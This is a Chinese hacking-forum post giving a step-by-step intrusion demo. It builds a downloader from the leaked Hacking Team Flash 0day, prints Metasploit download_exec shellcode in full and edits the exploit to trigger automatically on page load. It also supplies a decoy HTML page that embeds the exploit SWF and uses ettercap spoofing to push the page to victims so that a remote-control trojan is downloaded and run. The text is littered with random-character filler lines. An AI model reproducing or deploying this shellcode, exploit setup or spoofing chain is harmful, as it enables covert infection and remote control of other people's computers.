找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1397|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 I# k! ~- X! W 三、flash 0day之手工代码修改制作下载者实例入侵演示 1 s8 d. ]; j3 I8 P: _2 A0 V/ k. s

( Q( @, m( I3 o

: G# A( ]% ] v, G+ F8 s 利用到的工具: " ^1 y) F/ K- m1 B

5 g8 i' j* a! A* C3 ?

: j; X2 v! r% n$ v" W. C- ? Msf . N9 k% r1 y/ B) }

- p' c8 E+ U, q B

% t6 \0 |, |& n+ Q6 W9 Z6 J Ettercap # q' Q" _5 _/ u/ O) i+ w

8 z( F# j, C$ z

! Z, k( p( m8 g) M1 M( [& Y' } Adobe Flash CS6 & v! r' I, P5 O

. x6 B1 n* ~3 @! U+ w# y! y

- `% T2 Z. m' f; P" g+ u Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 . e7 X( B8 D8 [ u! y

" O# H8 L3 i/ X8 T( o3 l- r

S7 R4 c4 M2 J2 C: n$ @7 R 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + Y1 H& J% e" b" @" b

- L8 y2 s2 @9 Z

! }/ I& ~1 w6 V1 I! C6 O 如图: ' k+ s2 S6 a! i1 c8 l) `' F l8 `

; k/ b6 t$ I! Q W* h% k

# u- K9 B0 Y5 a3 _" z   / H0 W5 @" _8 f( `9 g) _

2 p5 s; O" v2 d" e3 ^! |8 c7 `

. I! [. T/ H& E; ]1 J   , h' {( s: @2 Y8 ^9 f: F8 @

* h- [' j( K# E& D) O; f

n( N1 Z& m! H; m9 G 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' Z& k4 R# |: i8 v

7 B" U( y$ o/ k3 S6 D$ t+ P3 V) Y

' H& Q R, U6 W& ~. p   : y. Q, F7 C' l/ [4 g- \) i8 u, n& k

6 r) W7 L K, e1 b

/ t- ^. a4 r% s6 s   " g) O5 i; k' n2 W4 i

5 w. @( e' t7 | M. H" p/ S# C5 m

- j5 ?4 E. J/ A6 R 然后执行generate -t dword生成shellcode,如下: ) G8 K$ e% o0 s; \: n5 d

9 E' o1 e9 O/ c5 t* O A" y

0 W* Q$ v/ B6 ]/ C   " O: Y" q6 o6 t O# ?0 M C% P$ b6 h

O! Z1 A X! ^

4 y; G7 z3 Z4 T 复制代码到文本下便于我们一会编辑flash exp,如下: # t4 a: t! E$ ~

9 Y: y7 P# p( B# ~: b! y

6 ?' K# @! k. ]* _4 S5 i2 S 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 1 V+ e9 D3 U3 }3 S7 u

( d5 W7 g& K) i! ^ \/ @

: l6 |& Q( T0 q, R/ M 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + I. I$ R1 H% V) [

/ A, Z& ` c8 X9 E- ]8 R; H! Q

0 K5 _9 I- }, Z. s& N# g 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, / B4 @0 d$ [, D6 i+ b

% F8 E; {4 ]2 F# z. `. ^) i5 Q2 ]

1 r) @# Q; a5 g! e; w; {6 ~ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) T8 q7 g# S7 i9 k, C

8 _9 g4 N. b l% {% m4 L0 `

* J4 |3 p! t; b+ S/ t' [' } 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, # z3 Q6 x4 D& X1 b! H# x

' h$ X' o; t8 A" W8 c

0 M8 b: R& v! U+ A: w" S 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 8 \7 Z/ G3 e2 Z$ A9 ?$ V" `5 R

( ~6 E1 F" n! Y2 R& I7 N4 O

2 ]+ y# Y; a! y3 D; D 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 6 z t9 ^4 V# |0 e* ^# X& s+ }2 l

- t. T! s( T+ v, ~& i2 U

?) v0 R5 q8 v7 s 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, & B; y( X9 e2 A7 a

/ T5 ^7 p7 ~. U( e7 W$ p6 w

% C9 ^" Z4 U" ? 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, - q( C+ U4 V& K* [

/ f1 y$ z/ U% T$ d4 o* N

* S1 w- i9 D7 e- y9 y0 | q 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / P6 p0 ^, L' N" M

8 F- Z! g- v% c. @! C) ]" _; }

9 f; \# U$ ] @9 O0 @ {6 D 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 7 c8 M2 Y: B7 U2 C. i% T& ^* V

4 e+ |# f# S5 b4 Q

7 W+ C H% D2 o/ h' p% \ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 D( K, Q/ y. u* @9 k

$ A9 |3 R% J. k8 s5 t- i9 `& l

( y2 J7 J) `' n9 K8 B1 l& g! m8 F 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 T4 a1 c. Z* U( s5 w9 w/ G2 g

4 c- w, X7 w L0 v

: M0 ^. \. Y/ l! _1 U) v5 N x5 b 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % a* {3 ~6 a6 u9 G

- i5 u! C# _" i. H4 g. L9 z

9 E: |" r9 y! e! u5 _! R) h' p   3 ~9 |$ U: j5 W: P B) J: l

7 f* R" b+ b) C+ y8 r

* i4 v) N) G2 U$ _" p# Z5 M! S5 ^, i: _   , O) l7 D1 q! E. o8 B' T- _+ x5 k

- I, [) R* c2 e- F) G' e2 ?

% ]" ~+ n% r# Q8 b+ R O 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 {9 p4 D6 x! |, J5 B" n

) Q+ G+ H% L: M

3 }" K4 T) ]7 v# a S& p) C) r2 c* B6 d   & R0 w i: n5 M2 ~2 ^' E+ Z+ |. k8 f! K

/ H1 W7 Y( D. ?8 j

, J/ P$ E2 D# o% b3 `% w. ~/ D 先修改ShellWin32.as,部分源代码如图: / J# l+ O$ l$ i* n& z

/ d% r2 W3 _4 m) z# M0 Y- p

" j2 \8 M, u, l- U+ _   0 s7 x; i( ^" M% [6 ?' K& k

3 U) b0 A" }# J# k& O w

3 c8 l& {" K) P. F 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : x7 {, `1 m* @; u1 r$ U

# v; ^" m/ a+ z q% s) l* ]

0 U0 u5 Z/ u$ m6 \* B/ n   7 E: C5 w7 N# a$ z- E M

% j+ _7 \0 k8 f

$ ~! k* O' H+ k: d8 [% f 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: " t! `5 i: u# I4 B, P

- E) }) q# C: i/ d& V, {& }

/ L. _ D# x" t; B   ) o% T' W# S3 t& Y7 M

+ A7 k4 j( s' k* \. G5 }

' h+ @9 `2 d- ~6 o! ~ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 2 o. p9 a6 G2 U( ^

8 e! O7 W) _4 K! y6 z

3 C; z2 j3 o: u& K' G l   6 o7 b- m- o+ N, s1 h% N

, \4 g% K! {4 @' w) c

, ^( @/ ~. R. _& S' `   ( c$ K; P0 I( L0 j; y

( ?( \ Q- V. G4 R) n7 k* p' c

3 B M: `4 q f) p4 l d* B, r   . _% W1 J/ i* r* [$ q9 _+ {

; y8 d2 I$ N$ h8 M/ _

& R: S7 b2 h' ~( v 然后点保存,下面我们来编译一下,打开 % e: T) e" W, ^% ~! _2 L2 Z# {

; ?# F3 }" P( T2 g& q+ @6 c L

9 y7 k b9 p9 S: o( x exp1.fla然后点文件-发布,看看编译没错误 $ x _! q# D6 z

7 K$ `1 b/ Y& I2 V1 T

; i" j, \9 B: W& N4 }) a   . Y' [3 E. }8 m$ t* K0 O' r

- h) n) ^- b* ^/ Q; Y6 Q2 r$ J1 F0 j

: n) i2 R- ]2 f* U5 S: u' n8 A0 l   * m& Z, `" k, n" \; }( ]7 a) C5 F* b

9 C3 H$ |1 Y" \

9 i3 M" X% c& \) { q- b, w   % b; a, ^1 j9 |6 Q: Q

3 A' o8 H+ G9 ~- [/ Q; r& K

, C2 u% g. U* E0 m   / R/ o7 \) `3 [2 v

+ C9 b' ~# j5 J# B5 d% r; A$ c

% l! [" p" Q7 M$ P 然后我们把生成的 4 |( g: s b. @7 F

& X/ z3 X$ \" O

, | Y k$ s3 [# R exp1.swf丢到kailinux /var/www/html下: 0 E+ u9 J; m' q. A

P y- {& M7 @ i* @

* l6 X+ a; }: q& A) n; `( P& \& t 然后把这段代码好好编辑一下 / w+ f2 {& w# `5 G4 ~! e3 _

}) P2 m' i* a r9 p' i

4 M: w u0 F9 A# D8 k4 @! U   6 o) P+ v4 L& m1 @6 k. N" L& s

A5 N, z0 } ]

( [$ {. }; V. V4 ^" ]8 |   9 O' l: B) q- @; Q2 C# P

' p: l" C Y, E0 o% f" P: O

! |; u c/ X6 b0 X! B   4 z& w/ p2 a) h

8 }7 O1 J, J( T6 \! y

( x0 O, Z9 w' m" F% J   4 g4 L+ c/ K. [2 C& a

% x4 K8 c- N8 j. m' G! Y" k

0 h# u+ v3 V1 a5 Y9 b) d   / i: D: m* I% F% ~6 F/ H9 p

# f; [& F: U6 U% J; h

: e* m) f7 I" K* {' ^( x   9 x% ?0 h8 ]/ |6 o- }1 P6 T

5 X2 D4 g7 Q6 R; X* f

- N7 j* M+ P" P% { <!DOCTYPE html> . q$ ~7 N& m5 j8 l) C2 L1 b/ P

0 Y' i2 _! i6 L0 U: d8 D

& y2 {% i; T4 c7 v9 ? <html> " |; V4 S2 C; d; l# x

! P7 B5 b( q. y4 \

# }; b; v! W$ y k1 m <head> . d) w; _; M. T1 G/ R) T" W# @

' s$ y# X# n8 ? ?7 q$ S

% h% C* s- Z ?, i) ?! z# K& g <meta http-equiv="Content-Type" content="text/html; # T' R% S- e0 B. g4 y1 F

! f/ P- J5 m+ U: D$ g

2 D9 C! V- Z" p. r, X% ` M charset=utf-8"/> , r& K8 S1 B% p: t- A% s

: _9 M* ~! R4 K" I* Z5 f5 @

+ I# l0 r: v7 Q, x) I I5 O </head> 7 P5 G, [) ]& T! H

' Y8 W# P+ G8 ^

' B% X6 y8 f& {2 J. U5 | <body> : c+ ]1 i$ e4 |4 H3 c

& K8 w- L3 Q+ Y7 t/ E0 z& E. }) R

. s/ X. a$ a1 o7 i <h2> Please wait, the requested page is loading...</h2> s( v# u% J* x- I6 o

0 S+ E8 r6 S# r

: a% q' V3 j5 U <br> " \& K1 `5 j2 }! Y: C( O7 F

# n( m8 D' D4 S0 F; p) B/ X( n% P+ P

, w3 t+ ^8 I7 D6 ~ <OBJECT ) u E9 B/ y x4 l# Y

2 E) s4 M0 `3 ~6 f, [. A

~/ j* l/ V" R; |5 y$ w classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie / K) F) _" T/ p d- o( m

0 W7 X' A* U7 S6 S: @. c

; a D# J% ?7 E4 U. s VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ( @0 [+ `$ n# X

. ~ P" z) C8 H( |

( I) a# r5 U7 V* u. D </body> + \+ `8 T, t4 Z2 L8 F, L( I

+ v+ c D+ T& C

) P: S: }# J( D$ Z; i! a' g <script> 2 c- n( Y/ L' @% N$ J6 ]

# a3 I0 v4 j* |0 U

' ?6 ^& f) G H' `9 G5 b$ C P     setTimeout(function () { B/ L8 q8 N- }+ `

( x: d( [1 K \% e4 |3 Q

9 X: r. ]1 v' l" J          7 K! y! n$ H$ o* V7 S; v8 ?/ o

$ B3 O: K9 a7 Y: x6 A

' J& D8 r+ f& \ window.location.reload(); % U& g% {2 u* o; d* `

' L8 Y1 \& [! T4 k/ D# Q" Y T5 X

" l3 @. ]) j: J1 D7 ~! m. [     }, 10000); 7 T( s( b: P" ~, U% f) K

( ^/ g7 [5 Y( ^: h

$ O \* u8 h' a. F0 |0 t; O" _ z4 p   , U( O+ E" e! u" U/ X& g/ ?2 I1 G4 ~) H

, r1 g) H9 Z( p9 p

* }8 B" R+ r. A$ K: m. l </script> 1 f# z i( c# _# X8 D f' m9 ^

, x; z) g$ t- @/ @" w( w

0 A F5 X9 N8 x% X </html> $ V6 h% ?5 y0 V' U0 n1 a

' a0 U2 n" ` G

. l. p7 e, m# n0 a& C7 s" L( |   4 X1 ]) T' @1 d' P- r. x

$ ?$ ?3 M2 @ v1 E# y* t8 b

$ }: f# a* p5 E b1 a 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ' ]9 S1 m! E* z9 B8 v) j5 H, x

: W1 ]0 `/ d# n

3 c( k7 F( ?0 `# e9 X5 u* Q   6 R3 y1 z7 \7 a$ T8 v7 Y' W

+ ]9 {/ X/ A/ V2 Y6 a( n+ |0 `

7 e. Y: Y" ]. ^: e( o) e: w: o/ n   ! S8 |2 |% F+ a. p: N9 {

* B: `8 a9 a1 N2 Y4 I' b2 {

5 A5 ^5 |+ A& Z; Y7 I+ C   3 r/ ?+ \% h4 M7 R2 ~2 A5 R0 [' q2 f: T

' w+ ?+ A. F5 `

- [* R% q( e3 j   ' H4 a" x B7 }

) g# j- Q* o/ [

1 n+ |7 \% ]( |: N$ x9 S   % w. T- R0 I9 s7 J+ T

3 I- }# x7 ~4 }6 K |

# ~) `9 C" ?( r5 ^0 ` 下面我们用ettercap欺骗如图: 0 Q# I# D! o9 @ x

& G9 l2 I, C e) J& ~

/ F2 e" u! d1 U" z1 T2 N) l9 q   8 V& V+ i6 t9 u% [- {: k

/ G. r3 F/ J. n% g9 J

% G" S$ x. y; I0 p! T& K   * w, y5 c I6 R8 e+ Q/ f

7 `2 k9 d, r9 v+ o& M1 k

- ]/ [ Q% C* S0 m+ }9 t 下面我们随便访问个网站看看: % p' ?1 P; h8 H: [ f2 i* `

# U# Q' @8 n6 w B1 B

6 z& y% ?; j# ~8 E# x' ]( w# g- M 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: - g; r% A w1 }( {

6 a I+ _ p/ E: E3 H9 y9 ?

' a3 L1 ~# J+ P/ e   ; [) T3 ^0 E7 ~$ \( R

9 G; f2 B% c) M( D4 f! y V" |

2 M7 m n: B% D9 m- m3 p8 ]4 i 我们看另一台, 3 p3 `* P3 {8 S

! {& r+ S5 p! T- }0 f6 L

' p8 D S* p c, O! B 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 . D7 }* k; D4 u. L' q* r

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表